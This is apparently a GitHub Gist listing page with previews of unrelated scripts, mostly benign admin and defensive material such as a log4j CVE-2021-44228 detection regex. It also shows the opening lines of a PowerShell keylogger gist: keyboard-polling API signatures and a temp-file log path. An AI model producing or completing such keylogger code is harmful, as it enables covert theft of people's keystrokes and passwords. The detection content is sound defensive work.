Skip to content

Instantly share code, notes, and snippets.

@Neo23x0
Neo23x0 / cyber-security-blogs.txt
Created September 10, 2022 13:49
Cyber Security Blogs
https://thedfirreport.com/
https://www.zerodayinitiative.com/blog/
https://codewhitesec.blogspot.com/
https://www.digitalshadows.com/blog-and-research/
https://blog.talosintelligence.com/
https://www.riskiq.com/blog/
https://www.sekoia.io/en/blog-sekoia-io/
https://www.nextron-systems.com/blog/
https://www.microsoft.com/security/blog/
https://blog.truesec.com/
@chadmando
chadmando / get-quarantinedmessages.ps1
Created February 23, 2022 17:04
Find all quarantined messages from the last week for all users. Results are grouped by users to make finding messages for specific users easier.
# Must be connected to Exchange Online
# Gets all Quarantined messages from the last week
# Results are grouped by recipient
Get-MessageTrace -EndDate (Get-Date) -StartDate (Get-Date).adddays(-7) -Status Quarantined |
Sort-Object -Property RecipientAddress |
Format-Table -GroupBy RecipientAddress
@Neo23x0
Neo23x0 / log4j_rce_detection.md
Last active January 28, 2024 08:19
Log4j RCE CVE-2021-44228 Exploitation Detection

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
@TheFreeman193
TheFreeman193 / Updatable Help on GitHub Pages.md
Last active April 1, 2022 21:09
Using GitHub Pages as a container for PowerShell Updatable Help

Using GitHub pages as a container for PowerShell Updatable Help

Introduction

The PowerShell updatable help system is a useful, if not under-utilised, way to supply up-to-date support documentation for your module. While its implementation and ongoing support from Microsoft for native PowerShell modules is questionable (in my opinion) to begin with, it remains under-used and, in many cases, an unrecognised method of supplying updates to help documentation. This may be, in part, related to the complicated way in which PowerShell is

@cedriczirtacic
cedriczirtacic / wol.py
Created February 12, 2019 16:11
wake-on-lan using scapy
from scapy.sendrecv import send
from scapy.layers.inet import *
from binascii import unhexlify
import sys
magic = ''
for h in sys.argv[1].split(':'): magic += unhexlify(h);
send(IP(dst="255.255.255.255")/UDP(dport=9)/Raw(load=(chr(0xff)*6 + magic*16)))
@MarkBaggett
MarkBaggett / 1 - pythons_sinister_secrets.md
Last active April 16, 2023 21:37
Come To The Darkside - Pythons Sinister Secrets
@psignoret
psignoret / Get-AzureADPSPermissions.ps1
Last active June 4, 2024 11:34
Script to list all delegated permissions and application permissions in Microsoft Entra ID
# THIS CODE IS PROVIDED AS IS WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING ANY IMPLIED WARRANTIES OF
# FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, OR NON-INFRINGEMENT.
#Requires -Modules @{ ModuleName="Microsoft.Graph.Authentication" ; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.DirectoryObjects"; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.Identity.SignIns"; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.Applications" ; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.Users" ; ModuleVersion="2.15.0" }
<#
@dasgoll
dasgoll / gist:7ca1c059dd3b3fbc7277
Created December 11, 2015 16:44
Simple Windows Keylogger using PowerShell
#requires -Version 2
function Start-KeyLogger($Path="$env:temp\keylogger.txt")
{
# Signatures for API Calls
$signatures = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
@JasonMorgan
JasonMorgan / TrustedHosts
Last active September 16, 2023 17:57
Setting and modifying Trusted Hosts with PowerShell
## Hey folks, this is just a quick walkthrough on modifying the trusted hosts property in WSMAN using Powershell
# By default PowerShell loads a PSDrive for the WinRM service
# We modify the trusted hosts property using the Set-Item cmdlet
Set-Item WSMan:\localhost\Client\TrustedHosts -value 192.168.1.13
#This sets the value to 192.168.1.13, it also overwrites any existing values
# If you want to set a subnet you can use the PowerShell wildcard character
Set-Item WSMan:\localhost\Client\TrustedHosts -value 192.168.1.*
@9to5IT
9to5IT / Script_Template.ps1
Last active June 5, 2024 14:47
PowerShell: Script Template
#requires -version 2
<#
.SYNOPSIS
<Overview of script>
.DESCRIPTION
<Brief description of script>
.PARAMETER <Parameter_Name>
<Brief description of parameter input required. Repeat this attribute if required>